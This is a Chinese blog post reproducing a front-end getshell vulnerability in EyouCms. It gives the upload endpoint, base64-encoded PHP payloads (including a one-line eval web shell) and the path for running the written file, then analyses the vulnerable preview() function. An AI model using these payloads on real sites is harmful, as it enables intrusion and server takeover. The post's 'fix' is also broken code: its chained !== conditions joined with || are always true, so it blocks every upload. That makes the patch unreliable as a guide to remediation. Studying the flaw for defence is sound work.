网站首页 个人杂记 正文
广告位 后台主题配置管理 |
文章源自【字节脉搏社区】-字节脉搏实验室
作者-Beginners
0x01 EyouCms前台GetShell漏洞复现
EyouCms是一个自由和开放源码的内容管理系统,它是一个可以独立使用的内容发布系统(CMS)
0x02 漏洞复现:
利用路径:
/index.php/api/Uploadify/preview
POST数据构造:
data:image/php;base64,PD9waHAgcGhwaW5mbygpOw==
直接访问:/preview/文件名.php
测试写入Shell:
data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs=
0x03 代码分析:
漏洞文件:applicationapicontrollerUploadify.php
漏洞触发函数:preview()
获取POST构造输入的数据,在利用preg_match()获取其中文件后缀和Base64编码数据赋值于$matches;
把获取的Base64编码数据$matches[2]和文件后缀$matches[1]拼接为文件名$filename;
判断文件是否存在,若不存在则$Base64进行base64解码后通过file_put_contents()写入文件中后输出$filename(文件名);到/preview/目录下;
0x04 漏洞修复:
使用白名单判断文件名后缀;
在Uploadify.php中213行到214行的代码修改为如下:
if ($type !== 'jpeg' || $type !=='png' || $type !=='gif' || $type!=='jpg') {
exit();
}
0x05 Cms下载地址:
下载地址:
https://share.weiyun.com/DGjtKLuR
- 上一篇: eyou 易邮去掉版权方法
- 下一篇: 曝光:UCLOUD云大使涉嫌欺骗推广员免费推广!
广告位 后台主题配置管理 |
你 发表评论:
欢迎- 2024-01-29一个既支持多种BT资源搜索,内容又全面,且界面风格简约的搜索引擎
- 2024-01-29输入邮箱就可以查看你的个人信息是否被泄露过。
- 2024-01-26最好的外贸邮箱:谷歌企业邮箱完全攻略
- 2024-01-25WordPress 外链跳转插件 v1.0.0
- 2024-01-25bat请求管理员权限代码
- 2024-01-13给大家42条无数人经历过的经验总结
- 2024-01-11京东云一代4.0免拆刷不死Breed
- 2023-12-29不锈钢环压管件:连接品质与信任的桥梁
- 17394℃谁敢横刀立马,唯我衡商兄弟连!-衡商精英群招募
- 15731℃【起航财富酒店】劳动节亲子活动——起航财富酒店烧烤活动通知
- 15671℃写给天下工厂的一封信:大象都倒下了,小心你也被干掉!
- 15033℃建站3天 日ip 300
- 14772℃玩自媒体必须知道的20个自媒体平台!
- 12474℃建站铺申请入驻头条号平台,特此声明; 敬请周知,谢谢!
- 12076℃外贸干货!外贸10大网站分析+100个B2B平台,收藏备用
- 11561℃衡商联盟写给天下自媒体的一封信:2016年,你很有可能会坐立难安!
- 8612℃b2b网站营销要注意的细节问题
本文暂时没有评论,来添加一个吧(●'◡'●)